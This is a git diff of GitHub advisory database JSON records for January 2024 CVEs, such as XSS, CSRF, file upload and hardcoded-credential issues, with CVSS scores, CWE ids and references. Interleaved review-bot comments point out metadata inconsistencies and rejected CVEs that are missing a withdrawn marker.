@@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-2934-h34j-g33x", + "modified": "2024-02-05T21:30:31Z", + "published": "2024-01-30T03:30:30Z", + "aliases": [ + "CVE-2023-51813" + ], + "details": "Cross Site Request Forgery (CSRF) vulnerability in Free Open-Source Inventory Management System v.1.0 allows a remote attacker to execute arbitrary code via the staff_list parameter in the index.php component.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-51813" + }, + { + "type": "WEB", + "url": "https://github.com/xxxxfang/CVE-Apply/blob/main/csrf-1.md" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-352" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-01-30T01:15:58Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/01/GHSA-29g4-35pw-347h/GHSA-29g4-35pw-347h.json b/advisories/unreviewed/2024/01/GHSA-29g4-35pw-347h/GHSA-29g4-35pw-347h.json index 8c7bcf9b833c0..a1ba3a088aebe 100644 --- a/advisories/unreviewed/2024/01/GHSA-29g4-35pw-347h/GHSA-29g4-35pw-347h.json +++ b/advisories/unreviewed/2024/01/GHSA-29g4-35pw-347h/GHSA-29g4-35pw-347h.json @@ -28,7 +28,8 @@ ], "database_specific": { "cwe_ids": [ - "CWE-119" + "CWE-119", + "CWE-120" ], "severity": "CRITICAL", "github_reviewed": false, diff --git a/advisories/unreviewed/2024/01/GHSA-2f9q-qvgh-8gvv/GHSA-2f9q-qvgh-8gvv.json b/advisories/unreviewed/2024/01/GHSA-2f9q-qvgh-8gvv/GHSA-2f9q-qvgh-8gvv.json new file mode 100644 index 0000000000000..81e89c8829b98 --- /dev/null +++ b/advisories/unreviewed/2024/01/GHSA-2f9q-qvgh-8gvv/GHSA-2f9q-qvgh-8gvv.json 
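Review bot: The details of the new CSRF record claim it "allows a remote attacker to execute arbitrary code", but the vector (UI:R, C:N/I:H/A:N) and the single CWE-352 mapping describe an integrity-only forged-request issue, not code execution; one of the two is wrong, and consumers that key on the prose will over-rate a record whose `severity` field is MODERATE. The only reference is a personal write-up (`xxxxfang/CVE-Apply/blob/main/csrf-1.md`) with no vendor advisory, and `affected` is empty, so the record contains no remediation information at all — worth flagging in the review trail so it is not mistaken for a vetted advisory.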
@@ -0,0 +1,47 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-2f9q-qvgh-8gvv", + "modified": "2024-01-29T00:30:17Z", + "published": "2024-01-29T00:30:17Z", + "aliases": [ + "CVE-2024-0987" + ], + "details": "A vulnerability classified as critical has been found in Sichuan Yougou Technology KuERP up to 1.0.4. Affected is an unknown function of the file /runtime/log. The manipulation leads to improper output neutralization for logs. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-252252. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-0987" + }, + { + "type": "WEB", + "url": "https://note.zhaoj.in/share/mhLwGOcLxYfP" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.252252" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.252252" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-116", + "CWE-117" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-01-29T00:15:08Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/01/GHSA-2fpf-9qrw-vj6r/GHSA-2fpf-9qrw-vj6r.json b/advisories/unreviewed/2024/01/GHSA-2fpf-9qrw-vj6r/GHSA-2fpf-9qrw-vj6r.json index 946c52687bd85..08dc35f30df19 100644 --- a/advisories/unreviewed/2024/01/GHSA-2fpf-9qrw-vj6r/GHSA-2fpf-9qrw-vj6r.json +++ b/advisories/unreviewed/2024/01/GHSA-2fpf-9qrw-vj6r/GHSA-2fpf-9qrw-vj6r.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-2fpf-9qrw-vj6r", - "modified": "2024-01-27T00:31:23Z", + "modified": "2024-02-01T06:31:04Z", "published": "2024-01-27T00:31:23Z", "aliases": [ "CVE-2024-23506" 
diff --git a/advisories/unreviewed/2024/01/GHSA-2g55-8535-gp6f/GHSA-2g55-8535-gp6f.json b/advisories/unreviewed/2024/01/GHSA-2g55-8535-gp6f/GHSA-2g55-8535-gp6f.json index 05611bec2aa08..26ae4e4054db5 100644 --- a/advisories/unreviewed/2024/01/GHSA-2g55-8535-gp6f/GHSA-2g55-8535-gp6f.json +++ b/advisories/unreviewed/2024/01/GHSA-2g55-8535-gp6f/GHSA-2g55-8535-gp6f.json @@ -1,14 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-2g55-8535-gp6f", - "modified": "2024-01-25T09:30:21Z", + "modified": "2024-01-31T21:31:03Z", "published": "2024-01-25T09:30:21Z", "aliases": [ "CVE-2023-33758" ], "details": "Splicecom Maximiser Soft PBX v1.5 and before was discovered to contain a cross-site scripting (XSS) vulnerability via the CLIENT_NAME and DEVICE_GUID fields in the login component.", "severity": [ - + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N" + } ], "affected": [ @@ -25,9 +28,9 @@ ], "database_specific": { "cwe_ids": [ - + "CWE-79" ], - "severity": null, + "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2024-01-25T08:15:08Z" diff --git a/advisories/unreviewed/2024/01/GHSA-2gc5-r3m4-5vgx/GHSA-2gc5-r3m4-5vgx.json b/advisories/unreviewed/2024/01/GHSA-2gc5-r3m4-5vgx/GHSA-2gc5-r3m4-5vgx.json new file mode 100644 index 0000000000000..1ba0350683a16 --- /dev/null +++ b/advisories/unreviewed/2024/01/GHSA-2gc5-r3m4-5vgx/GHSA-2gc5-r3m4-5vgx.json 
@@ -0,0 +1,38 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-2gc5-r3m4-5vgx",
+ "modified": "2024-02-08T18:30:38Z",
+ "published": "2024-01-31T00:30:17Z",
+ "aliases": [
+ "CVE-2023-51198"
+ ],
+ "details": "An issue in the permission and access control components within ROS2 Foxy Fitzroy ROS_VERSION=2 and ROS_PYTHON_VERSION=3 allows attackers to gain escalate privileges.",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"
+ }
+ ],
+ "affected": [
+
+ ],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-51198"
+ },
+ {
+ "type": "WEB",
+ "url": "https://github.com/16yashpatel/CVE-2023-51198"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+
+ ],
+ "severity": "CRITICAL",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2024-01-30T22:15:52Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2024/01/GHSA-2hpw-wm7x-857p/GHSA-2hpw-wm7x-857p.json b/advisories/unreviewed/2024/01/GHSA-2hpw-wm7x-857p/GHSA-2hpw-wm7x-857p.json
new file mode 100644
index 0000000000000..2809a56fee095
--- /dev/null
+++ b/advisories/unreviewed/2024/01/GHSA-2hpw-wm7x-857p/GHSA-2hpw-wm7x-857p.json
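Review bot: `cwe_ids` is left empty while `severity` is CRITICAL, so any downstream triage keyed on weakness class will silently skip this record; the same gap is visible in the unchanged context of GHSA-3cfc-hrv3-xpx5 and GHSA-3h2h-j4vg-8xm8 later in this chunk. The details text describes a "permission and access control" issue, which presumably maps to an access-control CWE once NVD assigns one, but that is inferred from the prose rather than taken from the source record. Until a CWE is present, consumers should read an empty `cwe_ids` as "not yet classified" rather than "no weakness known". The only non-NVD reference is a personal GitHub repository, so there is no vendor advisory in the record to confirm fixed versions.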
@@ -0,0 +1,46 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-2hpw-wm7x-857p", + "modified": "2024-01-31T21:31:03Z", + "published": "2024-01-31T21:31:03Z", + "aliases": [ + "CVE-2024-1116" + ], + "details": "A vulnerability was found in openBI up to 1.0.8. It has been classified as critical. Affected is the function index of the file /application/plugins/controller/Upload.php. The manipulation leads to unrestricted upload. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. VDB-252474 is the identifier assigned to this vulnerability.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-1116" + }, + { + "type": "WEB", + "url": "https://note.zhaoj.in/share/uCElTQRGWVyw" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.252474" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.252474" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-434" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-01-31T20:15:45Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/01/GHSA-2jf4-qrjv-8cx6/GHSA-2jf4-qrjv-8cx6.json b/advisories/unreviewed/2024/01/GHSA-2jf4-qrjv-8cx6/GHSA-2jf4-qrjv-8cx6.json new file mode 100644 index 0000000000000..469407f9bf3a6 --- /dev/null +++ b/advisories/unreviewed/2024/01/GHSA-2jf4-qrjv-8cx6/GHSA-2jf4-qrjv-8cx6.json 
@@ -0,0 +1,38 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-2jf4-qrjv-8cx6",
+ "modified": "2024-02-05T21:30:31Z",
+ "published": "2024-01-31T12:30:18Z",
+ "aliases": [
+ "CVE-2024-22305"
+ ],
+ "details": "Authorization Bypass Through User-Controlled Key vulnerability in ali Forms Contact Form builder with drag & drop for WordPress – Kali Forms.This issue affects Contact Form builder with drag & drop for WordPress – Kali Forms: from n/a through 2.3.36.\n\n",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N"
+ }
+ ],
+ "affected": [
+
+ ],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-22305"
+ },
+ {
+ "type": "WEB",
+ "url": "https://patchstack.com/database/vulnerability/kali-forms/wordpress-kali-forms-plugin-2-3-38-insecure-direct-object-references-idor-vulnerability?_s_id=cve"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-639"
+ ],
+ "severity": "HIGH",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2024-01-31T12:16:05Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2024/01/GHSA-2jx2-r7f9-93pw/GHSA-2jx2-r7f9-93pw.json b/advisories/unreviewed/2024/01/GHSA-2jx2-r7f9-93pw/GHSA-2jx2-r7f9-93pw.json
new file mode 100644
index 0000000000000..4f6c61b3c0678
--- /dev/null
+++ b/advisories/unreviewed/2024/01/GHSA-2jx2-r7f9-93pw/GHSA-2jx2-r7f9-93pw.json
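Review bot: The `details` string begins with `ali Forms Contact Form builder`, which reads as a truncated "Kali Forms" (the full name appears later in the same sentence), and it ends with a literal `\n\n`; the same trailing newlines appear in GHSA-39gr-m4xp-77wp and GHSA-3g98-33qx-2q68. Trimming leading and trailing whitespace at import time would remove the rendering artefact without altering the upstream wording. Note also that `details` bounds the affected range at "through 2.3.36" while the patchstack URL slug reads `2-3-38`; the slug may name the fixed release rather than the last affected one, but the two should be reconciled before anyone relies on the version bound.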
@@ -0,0 +1,42 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-2jx2-r7f9-93pw", + "modified": "2024-02-02T18:30:29Z", + "published": "2024-01-29T00:30:17Z", + "aliases": [ + "CVE-2024-23782" + ], + "details": "Cross-site scripting vulnerability exists in a-blog cms Ver.3.1.x series versions prior to Ver.3.1.7, Ver.3.0.x series versions prior to Ver.3.0.29, Ver.2.11.x series versions prior to Ver.2.11.58, Ver.2.10.x series versions prior to Ver.2.10.50, and Ver.2.9.0 and earlier versions. If this vulnerability is exploited, a user with a contributor or higher privilege may execute an arbitrary script on the web browser of the user who accessed the website using the product.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-23782" + }, + { + "type": "WEB", + "url": "https://developer.a-blogcms.jp/blog/news/JVN-34565930.html" + }, + { + "type": "WEB", + "url": "https://jvn.jp/en/jp/JVN34565930/" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-01-28T23:15:58Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/01/GHSA-2m5x-r2g7-72x8/GHSA-2m5x-r2g7-72x8.json b/advisories/unreviewed/2024/01/GHSA-2m5x-r2g7-72x8/GHSA-2m5x-r2g7-72x8.json new file mode 100644 index 0000000000000..11f92b952dc1b --- /dev/null +++ b/advisories/unreviewed/2024/01/GHSA-2m5x-r2g7-72x8/GHSA-2m5x-r2g7-72x8.json 
@@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-2m5x-r2g7-72x8", + "modified": "2024-01-30T18:30:20Z", + "published": "2024-01-30T18:30:20Z", + "aliases": [ + "CVE-2023-46230" + ], + "details": "In Splunk Add-on Builder versions below 4.1.4, the app writes sensitive information to internal log files.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:L/A:L" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-46230" + }, + { + "type": "WEB", + "url": "https://advisory.splunk.com/advisories/SVD-2024-0111" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-532" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-01-30T17:15:09Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/01/GHSA-2pj9-xmx5-6fv3/GHSA-2pj9-xmx5-6fv3.json b/advisories/unreviewed/2024/01/GHSA-2pj9-xmx5-6fv3/GHSA-2pj9-xmx5-6fv3.json index 3b81d6659c6f5..203177f645e57 100644 --- a/advisories/unreviewed/2024/01/GHSA-2pj9-xmx5-6fv3/GHSA-2pj9-xmx5-6fv3.json +++ b/advisories/unreviewed/2024/01/GHSA-2pj9-xmx5-6fv3/GHSA-2pj9-xmx5-6fv3.json @@ -1,14 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-2pj9-xmx5-6fv3", - "modified": "2024-01-26T09:30:23Z", + "modified": "2024-02-02T18:30:29Z", "published": "2024-01-26T09:30:23Z", "aliases": [ "CVE-2022-48622" ], "details": "In GNOME GdkPixbuf (aka gdk-pixbuf) through 2.42.10, the ANI (Windows animated cursor) decoder encounters heap memory corruption (in ani_load_chunk in io-ani.c) when parsing chunks in a crafted .ani file. A crafted file could allow an attacker to overwrite heap metadata, leading to a denial of service or code execution attack. This occurs in gdk_pixbuf_set_option() in gdk-pixbuf.c.", "severity": [ - + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H" + } ], "affected": [ 
@@ -25,9 +28,9 @@
 ],
 "database_specific": {
 "cwe_ids": [
-
+ "CWE-787"
 ],
- "severity": null,
+ "severity": "HIGH",
 "github_reviewed": false,
 "github_reviewed_at": null,
 "nvd_published_at": "2024-01-26T09:15:07Z"
diff --git a/advisories/unreviewed/2024/01/GHSA-2rjw-5f3r-3xhq/GHSA-2rjw-5f3r-3xhq.json b/advisories/unreviewed/2024/01/GHSA-2rjw-5f3r-3xhq/GHSA-2rjw-5f3r-3xhq.json
new file mode 100644
index 0000000000000..e9f04582ae1d0
--- /dev/null
+++ b/advisories/unreviewed/2024/01/GHSA-2rjw-5f3r-3xhq/GHSA-2rjw-5f3r-3xhq.json
@@ -0,0 +1,31 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-2rjw-5f3r-3xhq",
+ "modified": "2024-01-30T06:30:23Z",
+ "published": "2024-01-30T06:30:23Z",
+ "aliases": [
+ "CVE-2023-45928"
+ ],
+ "details": "Rejected reason: DO NOT USE THIS CANDIDATE NUMBER. ConsultIDs: none. Reason: This candidate was withdrawn by its CNA. Further investigation showed that it was not a security issue. Notes: none.",
+ "severity": [
+
+ ],
+ "affected": [
+
+ ],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-45928"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+
+ ],
+ "severity": null,
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2024-01-30T06:15:45Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2024/01/GHSA-2rq6-88fr-gr6r/GHSA-2rq6-88fr-gr6r.json b/advisories/unreviewed/2024/01/GHSA-2rq6-88fr-gr6r/GHSA-2rq6-88fr-gr6r.json
index 8b5b31f37afa6..a4919760c9c3d 100644
--- a/advisories/unreviewed/2024/01/GHSA-2rq6-88fr-gr6r/GHSA-2rq6-88fr-gr6r.json
+++ b/advisories/unreviewed/2024/01/GHSA-2rq6-88fr-gr6r/GHSA-2rq6-88fr-gr6r.json
@@ -21,6 +21,10 @@
 "type": "ADVISORY",
 "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-20963"
 },
+ {
+ "type": "WEB",
+ "url": "https://security.netapp.com/advisory/ntap-20240201-0003/"
+ },
 {
 "type": "WEB",
 "url": "https://www.oracle.com/security-alerts/cpujan2024.html"
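Review bot: GHSA-2rjw-5f3r-3xhq imports a CVE whose own text says it was rejected ("DO NOT USE THIS CANDIDATE NUMBER … withdrawn by its CNA … not a security issue") as a live advisory with `"severity": null` and empty `affected` and `cwe_ids`; GHSA-2v2h-qr9f-cf9h (CVE-2023-45916) in the next file has the same shape. OSV schema 1.4.0 has a top-level `withdrawn` timestamp for exactly this case, so emitting `"withdrawn": "<rejection-timestamp>"` (placeholder) would let scanners drop the entry instead of surfacing an unrated finding that a reader then has to dismiss by hand. If the exporter deliberately keeps rejected CVEs as plain records, a `database_specific` marker stating that would make the intent visible to consumers.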
diff --git a/advisories/unreviewed/2024/01/GHSA-2v2h-qr9f-cf9h/GHSA-2v2h-qr9f-cf9h.json b/advisories/unreviewed/2024/01/GHSA-2v2h-qr9f-cf9h/GHSA-2v2h-qr9f-cf9h.json new file mode 100644 index 0000000000000..b87e374b91d84 --- /dev/null +++ b/advisories/unreviewed/2024/01/GHSA-2v2h-qr9f-cf9h/GHSA-2v2h-qr9f-cf9h.json @@ -0,0 +1,31 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-2v2h-qr9f-cf9h", + "modified": "2024-01-29T09:30:24Z", + "published": "2024-01-29T09:30:24Z", + "aliases": [ + "CVE-2023-45916" + ], + "details": "Rejected reason: DO NOT USE THIS CANDIDATE NUMBER. ConsultIDs: none. Reason: This candidate was withdrawn by its CNA. Further investigation showed that it was not a security issue. Notes: none.", + "severity": [ + + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-45916" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-01-29T09:15:42Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/01/GHSA-2w8f-25gq-9g77/GHSA-2w8f-25gq-9g77.json b/advisories/unreviewed/2024/01/GHSA-2w8f-25gq-9g77/GHSA-2w8f-25gq-9g77.json new file mode 100644 index 0000000000000..ff36c7e9fb52b --- /dev/null +++ b/advisories/unreviewed/2024/01/GHSA-2w8f-25gq-9g77/GHSA-2w8f-25gq-9g77.json 
@@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-2w8f-25gq-9g77", + "modified": "2024-02-03T03:30:27Z", + "published": "2024-01-29T15:30:29Z", + "aliases": [ + "CVE-2023-5956" + ], + "details": "The Wp-Adv-Quiz WordPress plugin through 1.0.2 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup).", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-5956" + }, + { + "type": "WEB", + "url": "https://wpscan.com/vulnerability/b3d1fbae-88c9-45d1-92c6-0a529b21e3b2/" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-01-29T15:15:09Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/01/GHSA-2x33-pfvq-675c/GHSA-2x33-pfvq-675c.json b/advisories/unreviewed/2024/01/GHSA-2x33-pfvq-675c/GHSA-2x33-pfvq-675c.json new file mode 100644 index 0000000000000..b9da11d9af8db --- /dev/null +++ b/advisories/unreviewed/2024/01/GHSA-2x33-pfvq-675c/GHSA-2x33-pfvq-675c.json 
@@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-2x33-pfvq-675c", + "modified": "2024-02-03T00:31:33Z", + "published": "2024-01-29T21:30:27Z", + "aliases": [ + "CVE-2024-24136" + ], + "details": "The 'Your Name' field in the Submit Score section of Sourcecodester Math Game with Leaderboard v1.0 is vulnerable to Cross-Site Scripting (XSS) attacks.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-24136" + }, + { + "type": "WEB", + "url": "https://github.com/BurakSevben/2024_Math_Game_XSS" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-01-29T20:15:15Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/01/GHSA-2xh7-8hvj-mrr7/GHSA-2xh7-8hvj-mrr7.json b/advisories/unreviewed/2024/01/GHSA-2xh7-8hvj-mrr7/GHSA-2xh7-8hvj-mrr7.json new file mode 100644 index 0000000000000..7047b55299f68 --- /dev/null +++ b/advisories/unreviewed/2024/01/GHSA-2xh7-8hvj-mrr7/GHSA-2xh7-8hvj-mrr7.json 
@@ -0,0 +1,46 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-2xh7-8hvj-mrr7", + "modified": "2024-02-03T00:31:33Z", + "published": "2024-01-30T03:30:30Z", + "aliases": [ + "CVE-2024-22938" + ], + "details": "Insecure Permissions vulnerability in BossCMS v.1.3.0 allows a local attacker to execute arbitrary code and escalate privileges via the init function in admin.class.php component.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-22938" + }, + { + "type": "WEB", + "url": "https://github.com/n0Sleeper/bosscmsVuln/issues/1" + }, + { + "type": "WEB", + "url": "https://github.com/n0Sleeper/bosscmsVuln" + }, + { + "type": "WEB", + "url": "https://www.bosscms.net/" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-863" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-01-30T01:16:00Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/01/GHSA-3365-3gc3-3q8c/GHSA-3365-3gc3-3q8c.json b/advisories/unreviewed/2024/01/GHSA-3365-3gc3-3q8c/GHSA-3365-3gc3-3q8c.json index 6d8cd037cd340..9f9539b5f9441 100644 --- a/advisories/unreviewed/2024/01/GHSA-3365-3gc3-3q8c/GHSA-3365-3gc3-3q8c.json +++ b/advisories/unreviewed/2024/01/GHSA-3365-3gc3-3q8c/GHSA-3365-3gc3-3q8c.json 
@@ -1,14 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-3365-3gc3-3q8c", - "modified": "2024-01-24T00:30:32Z", + "modified": "2024-02-01T21:30:30Z", "published": "2024-01-24T00:30:32Z", "aliases": [ "CVE-2023-51201" ], "details": "Cleartext Transmission issue in ROS2 (Robot Operating System 2) Foxy Fitzroy, with ROS_VERSION=2 and ROS_PYTHON_VERSION=3 allows attackers to access sensitive information via a man-in-the-middle attack.", "severity": [ - + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N" + } ], "affected": [ @@ -25,9 +28,9 @@ ], "database_specific": { "cwe_ids": [ - + "CWE-319" ], - "severity": null, + "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2024-01-23T22:15:16Z" diff --git a/advisories/unreviewed/2024/01/GHSA-33f3-88p6-j3f9/GHSA-33f3-88p6-j3f9.json b/advisories/unreviewed/2024/01/GHSA-33f3-88p6-j3f9/GHSA-33f3-88p6-j3f9.json new file mode 100644 index 0000000000000..a9fe91a219ae1 --- /dev/null +++ b/advisories/unreviewed/2024/01/GHSA-33f3-88p6-j3f9/GHSA-33f3-88p6-j3f9.json 
@@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-33f3-88p6-j3f9", + "modified": "2024-02-01T06:31:05Z", + "published": "2024-01-30T15:30:22Z", + "aliases": [ + "CVE-2024-24324" + ], + "details": "TOTOLINK A8000RU v7.1cu.643_B20200521 was discovered to contain a hardcoded password for root stored in /etc/shadow.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-24324" + }, + { + "type": "WEB", + "url": "https://github.com/funny-mud-peee/IoT-vuls/blob/main/TOTOLINK%20A8000RU/TOTOlink%20A8000RU%20hard%20code.md" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-798" + ], + "severity": "CRITICAL", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-01-30T15:15:09Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/01/GHSA-33p8-v8q2-mx53/GHSA-33p8-v8q2-mx53.json b/advisories/unreviewed/2024/01/GHSA-33p8-v8q2-mx53/GHSA-33p8-v8q2-mx53.json index a6d7610bc36ff..0c660b89b6ffe 100644 --- a/advisories/unreviewed/2024/01/GHSA-33p8-v8q2-mx53/GHSA-33p8-v8q2-mx53.json +++ b/advisories/unreviewed/2024/01/GHSA-33p8-v8q2-mx53/GHSA-33p8-v8q2-mx53.json 
@@ -1,14 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-33p8-v8q2-mx53", - "modified": "2024-01-23T21:30:20Z", + "modified": "2024-01-30T18:30:19Z", "published": "2024-01-23T21:30:20Z", "aliases": [ "CVE-2023-47196" ], "details": "An origin validation vulnerability in the Trend Micro Apex One security agent could allow a local attacker to escalate privileges on affected installations.\n\nPlease note: an attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability.\n\nThis vulnerability is similar to, but not identical to, CVE-2023-47197.", "severity": [ - + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" + } ], "affected": [ @@ -29,9 +32,9 @@ ], "database_specific": { "cwe_ids": [ - + "CWE-346" ], - "severity": null, + "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2024-01-23T21:15:08Z" diff --git a/advisories/unreviewed/2024/01/GHSA-343v-9ccv-7535/GHSA-343v-9ccv-7535.json b/advisories/unreviewed/2024/01/GHSA-343v-9ccv-7535/GHSA-343v-9ccv-7535.json index 7f2be374e1cee..66a2f4db249eb 100644 --- a/advisories/unreviewed/2024/01/GHSA-343v-9ccv-7535/GHSA-343v-9ccv-7535.json +++ b/advisories/unreviewed/2024/01/GHSA-343v-9ccv-7535/GHSA-343v-9ccv-7535.json @@ -21,6 +21,14 @@ "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-20952" }, + { + "type": "WEB", + "url": "https://lists.debian.org/debian-lts-announce/2024/01/msg00023.html" + }, + { + "type": "WEB", + "url": "https://security.netapp.com/advisory/ntap-20240201-0002/" + }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpujan2024.html" diff --git 